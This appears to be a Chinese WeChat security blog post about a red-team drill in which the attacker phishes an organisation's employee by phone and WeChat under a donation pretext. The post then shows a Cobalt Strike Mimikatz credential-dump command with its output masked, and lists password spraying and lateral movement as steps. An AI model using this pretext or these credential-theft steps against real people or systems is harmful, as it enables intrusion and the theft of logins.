由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!
免责声明
由于传播、利用本公众号所发布的而造成的任何直接或者间接的后果及损失,均由使用者本人承担。LK安全公众号及原文章作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
欢迎各位师傅们关注!!!
前段时间参加某攻防演练,web端实在难啃,索性直接钓鱼
网上发现联系方式:http://www.xxx.org/article.html?id=10759
通过电话联系该单位员工,并以捐款为由添加个人微信账号
发送钓鱼文件
再回头去看 我们的鱼儿已经上钩
先抓密码
beacon> logonpasswords
[*] Tasked beacon to run Mimikatz inject pid:8980
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command into 8980 (x64)
[+] host called home, sent: 297602 bytes
[+] received output:
Authentication Id : 0 ; 480966 (00000000:000756c6)
Session : Interactive from 1
User Name : Administrator
Domain : USER-20160407FL
Logon Server : USER-20160407FL
Logon Time : 2023/5/15 11:08:54
SID : S-1-5-21-174909251-2012762638-3167670601-500
msv :
[00010000] CredentialKeys
* NTLM : 马赛克
* SHA1 : 马赛克
[00000003] Primary
* Username : Administrator
* Domain : USER-20160407FL
* NTLM : 马赛克
* SHA1 : 马赛克
tspkg :
wdigest :
* Username : Administrator
* Domain : USER-20160407FL
* Password : 马赛克
kerberos :
* Username : Administrator
* Domain : USER-20160407FL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2023/5/15 11:01:07
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : USER-20160407FL$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2023/5/15 11:01:07
SID : S-1-5-20
msv :
tspkg :
wdigest :
* Username : USER-20160407FL$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : user-20160407fl$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 55917 (00000000:0000da6d)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2023/5/15 11:01:05
SID :
msv :
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : USER-20160407FL$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2023/5/15 11:01:05
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : USER-20160407FL$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : user-20160407fl$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman
通过密码喷洒获取6台主机权限
搭建内网隧道进入内网横向
wmiexec连接证明,成功执行命令
打印机权限
登录主机桌面
获得某市工作群权限 和全省工作群权限
后又突破强隔离内网 进入某市政务云专网
获得ssh弱口令若干
只是展示了部分成果
最终也是成功的将防守单位打穿出局(钓鱼yyds)
欢迎关注!!!
为了方便师傅们交流学习,我特意创建了一个群聊。内部会分享一些脱敏的漏洞报告,渗透测试实战案例,更有若干大牛巨佬分享经验。后续还会提供一些福利包括送书,小礼物等等,欢迎各位师傅进群交流。
关于知识星球
经过与内部群师傅们商量,知识星球已经由168一年改为168永久,到期为所有师傅进行续费。一次加入,终身免费!!!!
如果师傅还在上学但还是想入圈子学习,请添加我联系方式,私聊我以学生价入圈!!!!
原文始发于微信公众号(LK安全):记一次钓鱼实战打穿目标单位
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论